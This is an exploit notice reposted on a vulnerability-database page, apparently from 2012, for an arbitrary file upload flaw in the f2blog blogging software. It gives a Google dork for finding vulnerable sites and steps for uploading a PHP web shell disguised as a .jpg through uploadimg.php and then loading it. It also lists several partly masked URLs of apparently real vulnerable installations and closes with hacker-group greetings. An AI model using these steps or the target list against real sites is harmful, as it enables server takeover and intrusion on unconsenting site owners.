f2blog Remote File Uploader (RFU) Sh3ll

2012.06.03
Credit: MR.XpR
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#################################################### # # Name: f2blog Remote File Uploader (RFU) Sh3ll # # # Google Dork: inurl:/plugins/expose4/uploadimg.php # # # Type: PhP # # # Author: MR.XpR # # # Tested On: Linux Backtrack # ##################################################### 1.Upload shell -----> Sh3ll.php.jpg 2.load shell -------> http://[patch]/components/com_expose/expose/img/shell.php.jpg Expamle : http://163.3xxx.160.242/f2blog/plugins/expose4/uploadimg.php http://www.hxxxox.comeze.com/blog/plugins/expose4/uploadimg.php http://16xx.69.239/kcvs021/plugins/expose4/uploadimg.php http://debxxahliu.idv.tw/blog/plugins/expose4/uploadimg.php http://12xx5.24.7:8080/blog/counsel/plugins/expose4/uploadimg.php http://163xx215.11/local/f2blog/plugins/expose4/uploadimg.php http://12xxx.7:8080/blog/counsel/plugins/expose4/uploadimg.php Load shell : http://[patch]/components/com_expose/expose/img/shell.php.jpg Tnx To All IRaNiaN HAckers | IRaNHacK.ORG Persian Gulf For Ever

References:

http://IRaNHacK.ORG/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top